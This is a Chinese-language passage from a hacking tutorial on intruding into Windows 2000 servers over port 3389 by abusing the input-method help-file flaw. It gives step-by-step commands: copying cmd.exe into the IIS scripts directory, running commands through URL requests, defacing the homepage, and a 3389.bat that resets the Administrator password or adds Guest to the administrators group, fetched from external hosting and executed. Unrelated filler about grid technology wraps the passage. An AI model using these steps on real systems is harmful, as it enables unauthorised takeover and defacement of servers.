網絡技術是從1990年代中期發展起來的新技術，它把互聯網上分散的資源融為有機整體，實現資源的全面共享和有機協作，使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計算機、存儲資源、數據資源、信息資源、知識資源、專家資源、大型數據庫、網絡、傳感器等。 當前的互聯網只限于信息共享，網絡則被認為是互聯網發展的第三階段。

6.2 基于3389端口結合輸入法漏洞入侵(2)

    

6.2.2  通過輸入法漏洞簡單更改目標服務器的主頁

(1) 在如圖6-36所示的【跳至URL】對話框中輸入D:\winnt\system32\cmd.exe(這里是Win2k安裝在D盤)，單擊【確定】按鈕，如圖6-36所示。

圖6-36  輸入CMD程序路徑

(2) 此時會出現下載CMD.exe程序對話框，如圖6-37所示。

圖6-37  下載CMD程序

(3) 在【文件下載】對話框中選擇【將該程序保存到磁盤】單選按鈕，單擊【確定】按鈕將CMD保存到d:\inetpub\scripts目錄下，如圖6-38所示。

圖6-38  將CMD程序保存到Scripts目錄下

(4) 在如圖6-36所示的【跳至URL】中輸入http://127.0.0.1/scripts/cmd.exe?/c+dir+d:\，可以列出D盤目錄，如圖6-39所示。

圖6-39  列出D盤目錄

注意：

也可在本地機的瀏覽器中輸入http://127.0.0.1/scripts/cmd.exe?/c+dir+d:\ 如圖6-40   所示。

圖6-40  在本地瀏覽器中列出目標機D盤目標

(5) 在圖6-36所示的【跳至URL】對話框或本地瀏覽器中輸入如下請求，就可以達到簡單地更改目標服務器主頁的目的：

http://127.0.0.1/scripts/cmd".exe?/c+echo+網站有漏洞+>d:\inetpub\wwwroot\default.asp

如圖6-41所示。

圖6-41  更改目標服務器主頁

(6) 獲得Administrators組權限可圖6-36所示的【跳至URL】對話框或在本地瀏覽器中輸入如下請求：

http://127.0.0.1/scripts/cmd".exe?/c echo net user administrator ffhh>3389.bat

說明：

利用回顯命令與管道命令相結合將net user administrator ffhh(將Administrator的密碼更改為ffhh)輸入到目標服務器Scripts目錄下，文件名為3389.bat，如圖6-42所示。

圖6-42  建立3389.bat

(7) 返回到圖6-36所示的【跳至URL】對話框中輸入d:\inetpub\scripts\3389.bat，單擊【確定】按鈕，在【文件下載】對話框中選擇【在當前位置運行該程序】單選按鈕，單擊【確定】按鈕運行，如圖6-43所示。

圖6-43  下載3389.bat文件

(8) 以用戶名Administrator，密碼ffhh 登錄，入侵成功！

6.2.3  通過輸入法漏洞來獲得目標機Administrators組的權限

(1) 打開記事本，輸入如下命令：

net user administrator ffhh

命令解釋：

將Administrator的密碼更改為：ffhh。

或是：

net user guest /active:yes           

net user guest ffhh

net localgroup administrators guest /add

命令解釋：

net user guest /active:yes是將用戶名Guest激活。

net user guest ffhh 將Guset的密碼設為ffhh。

net localgroup administrators guest /add 將Guest添加到超級用戶組里。

如圖6-44所示。

圖6-44  在記事本里輸入命令

(2) 選擇【文件】→【另存為】命令，在【另存為】對話框中，將剛建立的文件另存為名為3389.bat的文件，單擊【保存】按鈕即可。

(3) 將3389.bat上傳到免費個人主頁空間中(比如：163個人主頁空間、8u8個人主頁空間等)。這里將3389.bat上傳至http://127.0.0.1下，其路徑即為http://127.0.0.1/3389.bat。

(4) 接入侵測試(一)如圖6-36所示的【跳至URL】對話框中輸入http://127.0.0.1/ 3389.bat。

(5) 單擊【確定】按鈕，在【文件下載】對話框中選擇【在當前位置運行該程序】單選按鈕，單擊【確定】按鈕，將運行3389.bat中的命令，如圖6-45所示。

圖6-45  執行3389.bat

(6) 3389.bat運行完畢后，關閉輸入法幫助文件窗口，以用戶名guest，密碼ffhh登錄，此時的Guest為超級用戶，如圖6-46所示。

圖6-46  通過3389端口登錄到Win2K服務器

(7) 入侵測試成功！

提示：

如果在使用3389端口登錄，在調出輸入法幫助文件時，幫助命令呈現灰色，表明對方服務器已打了輸入法漏洞的補丁。

網絡的神奇作用吸引著越來越多的用戶加入其中，正因如此，網絡的承受能力也面臨著越來越嚴峻的考驗―從硬件上、軟件上、所用標準上......，各項技術都需要適時應勢，對應發展，這正是網絡迅速走向進步的催化劑。